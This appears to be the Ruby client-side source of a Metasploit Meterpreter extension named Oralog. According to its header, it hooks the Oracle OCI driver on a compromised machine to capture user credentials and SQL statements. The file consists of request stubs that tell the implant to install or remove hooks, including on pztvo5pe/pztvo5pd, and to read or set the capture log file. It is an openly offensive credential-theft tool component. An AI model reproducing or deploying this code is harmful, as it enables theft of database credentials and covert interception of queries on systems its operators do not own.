#!/usr/bin/env ruby
# -*- coding: binary -*-

require 'rex/post/meterpreter/extensions/oralog/tlv'

module Rex
module Post
module Meterpreter
module Extensions
module Oralog

###
#
# This meterpreter extensions hooks into the OCI driver to 
# redirect critical Oracle functions in order to dump the
# user credentials and the SQL statements
#
###
class Oralog < Extension


	def initialize(client)
		super(client, 'Oralog')

		client.register_extension_aliases(
			[
				{
					'name' => 'oralog',
					'ext'  => self
				},
			])
	end
	
	def oralog_hook()
		request = Packet.create_request('oralog_hook')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_HOOK)
		}
	end

	def oralog_unhook()
		request = Packet.create_request('oralog_unhook')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_UNHOOK)
		}
	end

	def oralog_getlogfile()
		request = Packet.create_request('oralog_getlogfile')
		response = client.send_request(request)
		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_GETLOGFILE)
		} 
	end


	def oralog_setlogfile(filename)
		request = Packet.create_request('oralog_setlogfile')
		request.add_tlv(TLV_TYPE_ORALOG_SETLOGFILE, filename)
		response = client.send_request(request)
		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_SETLOGFILE)
		} 
	end

	def oralog_hookpztvo5pe()
		request = Packet.create_request('oralog_hookpztvo5pe')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_HOOKPZTVO5PE)
		}
	end

	def oralog_hookpztvo5pd()
		request = Packet.create_request('oralog_hookpztvo5pd')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_HOOKPZTVO5PD)
		}
	end	


	def oralog_unhookpztvo5pe()
		request = Packet.create_request('oralog_unhookpztvo5pe')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_UNHOOKPZTVO5PE)
		}
	end

	def oralog_unhookpztvo5pd()
		request = Packet.create_request('oralog_unhookpztvo5pd')

		response = client.send_request(request)

		return {
			'response' => response.get_tlv_value(TLV_TYPE_ORALOG_UNHOOKPZTVO5PD)
		}
	end	


end

end; end; end; end; end
